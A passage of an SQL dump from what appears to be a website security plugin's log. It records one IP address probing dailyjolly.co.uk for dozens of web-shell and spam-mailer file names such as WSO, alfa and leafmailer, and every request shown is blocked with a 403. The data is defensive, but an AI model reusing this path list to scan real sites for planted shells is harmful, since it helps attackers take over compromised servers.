3.5.30729)\"}','sHAxSlCt9OBaQNEmgRPkLDUp',0,1674412823.9224,768,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/p.php?http://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','RTVyOUoI9w3pL64E0HQPhWrC',0,1674412831.3000,529,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/q.php?http://dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bRi3dzePTEXl0kZD19I5wAFu',0,1674412838.4402,1063,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/s.php?http://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SD4E9CJx3lMq8I7BjrPNiybX',0,1674412844.9762,744,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/d.php?http://dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DR1t0ahr698GSHVjOyLwFqM3',0,1674412850.4642,417,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/h.php?http://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TZtYpvn7ULWl89wIRXAcbgFa',0,1674412860.8707,589,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/j.php?http://dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qNsSzhG1lZUEgyOxurwoVBbQ',0,1674412866.7822,520,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/k.php?http://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IsyeSJ9Wxd83ztq6ni2hQ7bE',0,1674412871.6095,539,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/l.php?http://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5LEyremCF0dwtfhxgU6Nl3i8',0,1674412878.3808,334,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/n.php?http://dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P4wS1GLVcZsx2zid6j0pnoh9',0,1674412882.5279,331,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xindex.php?http://dailyjolly.co.uk/xindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rvpo8G2sanYgmeUtPd5wEhAK',0,1674412890.3395,1628,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kindex.php?http://dailyjolly.co.uk/kindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1HkehmAnpdWfSVqvI4zCTKO5',0,1674412900.8341,491,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/FoxWSOv1.php?http://dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J7wbHF5mZp3DqBQl08hEVRcX',0,1674412911.0816,694,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alf.php?http://dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qzA3SKUX87uRvsDlWpnBikZr',0,1674412919.2958,556,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/bb.php?http://dailyjolly.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Mw3AQNoj6czUx9JtKfyHSERp',0,1674412928.0081,780,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/lf.php?http://dailyjolly.co.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BU7pOjThIXFZni4S9K3qdgJa',0,1674412934.0688,343,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/WSO.php?http://dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a5ZWi8UITgQl6ShxMnkH7jsz',0,1674412941.5439,329,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/xxx.php?http://dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3lv87GkPCupVJHwxUtEdgqWa',0,1674412946.7994,310,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/hello.php?http://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OSULYEyGWRQulBfsAaMNci0h',0,1674412953.9001,525,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ok.php?http://dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PhVLXlIow0aepAurjfvyUE3b',0,1674412961.2162,629,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/if.php?http://dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','3Ci15QGV0Yy8vwulfPpex7qS',0,1674412966.6931,435,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kk.php?http://dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xAvGy3rhqML9K2JtsPbkZ8Xw',0,1674412970.5865,636,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mrjn.php?http://dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Jiy0vbOrEkxGolTSgXf2QdP1',0,1674412980.0200,370,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kn.php?http://dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cdt8YsmXpUvNAPnIg3woKlZz',0,1674412987.2308,1055,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3301.php?http://dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CkR8oeNfMtA6OHmyYr4IVaFW',0,1674412991.4356,472,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leaf.php?http://dailyjolly.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J5hx1vRYZB6USHMdmk8X9feL',0,1674412995.8037,645,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alex.php?http://dailyjolly.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1ZrHmDRhMln7vjaXbNdzxLQu',0,1674413006.7360,767,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/mailer.php?http://dailyjolly.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OwZmHd9IiS0Ea6Msh4ygYoNG',0,1674413016.0302,681,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/anone.php?http://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','gDuG7vqHACZXorTRPNhFJS6y',0,1674413026.0225,744,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-configer.php?http://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pSC4UvVm3QFq8h2RZYTwjEak',0,1674413032.9259,283,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-ad.php?http://dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vSlb80R3w9Bnik4NZjGfLs7H',0,1674413036.0693,495,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/send.php?http://dailyjolly.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0NOD7QlPWxd5hi3tsaEUfbZB',0,1674413041.8543,273,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3.php?http://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','S0bz9yiRdpolTrYKJh4NwMf1',0,1674413047.3559,334,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.wp-cache.php?http://dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OL6Uwo9inrcRmMzEjqftdVJB',0,1674413052.9559,371,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/sendmail.php?http://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2Z1JwB39LzaghqmvHXidj0Ms',0,1674413060.4840,430,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rahma.php?http://dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','a6ky3GQMNueAP2ph40V9C8zF',0,1674413066.8064,381,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/nasgor.php?http://dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9QDWRsTNJ5PbGa2eUHkOSzum',0,1674413071.8599,382,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-confirm.php?http://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fLlVd9kx50pP1nhAc8sbGgFq',0,1674413079.2281,720,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alfa123.php?http://dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1xPOG87QJBHWqy0uNSm3oYbn',0,1674413085.4402,534,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/upload.php?http://dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','y0WnI2mKarg7J14QBFi3v8Dq',0,1674413094.9842,366,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/bypass.php?http://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZWl8YtJsdSj6UwAf9cnvCeir',0,1674413099.0093,325,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-one.php?http://dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','q7r29OChRoZaXJ1F6cfe3V0S',0,1674413106.9813,430,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexus.php?http://dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FRCH5EzxUqTPhXjfwb3NDc24',0,1674413114.8758,521,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso1337.php?http://dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KkGJelwFP86cYqtfCimpB15M',0,1674413122.3503,433,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1337.php?http://dailyjolly.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','R4IVb6Lmh1a2olJGfwys7rvx',0,1674413128.6226,459,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/blog.php?http://dailyjolly.co.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BMKUYjdRZH7eifml5T2rQ3wP',0,1674413135.0592,276,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/it.php?http://dailyjolly.co.uk/it.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ph2oe0byiLH9aFtOdkcVRqYz',0,1674413143.9821,410,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/kiss.php?http://dailyjolly.co.uk/kiss.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OkYH7Q6rSU92bRaDfy4Cxs0l',0,1674413150.1675,540,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/0.php?http://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c7ZnqDIHXURWieB4vNpmSOzA',0,1674413154.7500,290,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp2.php?http://dailyjolly.co.uk/wp2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PUknGE6aSzqXFi412thRgv7j',0,1674413164.6414,352,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/owl.php?http://dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BOGtxwJ4Dkfy3hd1XPM70HUF',0,1674413168.6553,341,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/vuln.php?http://dailyjolly.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ArbtUndiXg8lcfZLoIRxuVBw',0,1674413176.6200,529,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/ohayo.php?http://dailyjolly.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xCOfj0ISWPHqy3R2FVohT4lc',0,1674413186.1008,290,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-admin.php?http://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ae0pAZ6OKqXPYz4VhDkbFRvj',0,1674413191.5146,358,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/cms.php?http://dailyjolly.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MpKrGevV4RZY8SAb7CsglyTP',0,1674413200.4668,356,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-uploads.php?http://dailyjolly.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nyzEm4Q1KkhbpJlUBOId9ugx',0,1674413204.6654,343,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Gel.php?http://dailyjolly.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tDENv2KlCaxIY7MjHJZ3q9dr',0,1674413209.3461,262,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/41.php?http://dailyjolly.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bl3AqZnykPuWCxeYX5hmULzB',0,1674413214.8211,1323,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/4price.php?http://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tTK15laNmekrc3jqdyL8DJEW',0,1674413220.0709,296,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/MARIJUANA.php?http://dailyjolly.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wu12NrSF3ZJRthyzipm4c7gk',0,1674413226.2542,635,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/.fk.php?http://dailyjolly.co.uk/.fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iwquatcXUZCdo8LIe3Ag7jNs',0,1674413233.0841,317,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/XxX.php?http://dailyjolly.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FzkApQUXt6V92ExCGjNSioa4',0,1674413239.4269,365,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexuse.php?http://dailyjolly.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ksJvAragxz8f50UejiPdoMpq',0,1674413244.6000,611,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/Sendemail.php?http://dailyjolly.co.uk/Sendemail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','02bhxjs6iavAXyNV8ECZo4lg',0,1674413249.5561,418,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/content.php?http://dailyjolly.co.uk/content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E6UzCaBdsXhDmJKgZFoNVbwk',0,1674413259.2833,366,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/leafmailer2.8.php?http://dailyjolly.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EbvKZ6RsemLP974F5upI20cX',0,1674413266.4639,725,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/olu.php?http://dailyjolly.co.uk/olu.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XV2Fcwt8DAOnG04evfqLQsrj',0,1674413272.7639,304,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexusmailer%202.0.php?http://dailyjolly.co.uk/alexusmailer%202.0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FeO6GXo7cTyBLPr8t0AWaxM5',0,1674413278.8228,363,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/rss.php?http://dailyjolly.co.uk/rss.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4yGCdYclPpAVZEaxSXjqgzn7',0,1674413283.6721,501,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/alexus-mailer.php?http://dailyjolly.co.uk/alexus-mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','NvQR1gmMYhrJ9DfGpEwqIxiH',0,1674413287.1579,698,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-file.php?http://dailyjolly.co.uk/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','F6aDrEp3dNTYMiQJVecWA2lv',0,1674413295.1523,538,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso2.php?http://dailyjolly.co.uk/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VD3pE8LgnKu5FWo2NcyfzXqJ',0,1674413301.6621,521,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wso1.php?http://dailyjolly.co.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 